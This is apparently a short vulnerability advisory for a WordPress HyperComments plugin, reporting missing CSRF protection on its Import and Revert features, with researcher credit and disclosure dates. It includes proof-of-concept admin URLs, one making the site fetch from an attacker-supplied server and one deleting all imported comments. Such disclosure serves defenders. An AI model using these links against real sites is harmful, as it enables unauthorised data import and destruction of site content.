The plugin does not have CSRF checks in the Import and Revert HyperComments features, allowing attackers to make logged in admin perform such actions via a CSRF attack
Go to https://example.com/wordpress/wp-admin/admin.php?r=import%2Fhypercomments&url=http://<your_server>, and you will see a get request in your server logs indicating that the import request is done. To revert the imports (ie delete all imported comments): https://example.com/wp-admin/admin.php?r=import%2Fhypercomments&revert=1 https://www.youtube.com/watch?v=75BH2m8cmPo
YouTube Video
Brandon Roldan
Brandon Roldan
Yes
2022-01-19 (about 1 years ago)
2022-01-19 (about 1 years ago)
2022-04-10 (about 1 years ago)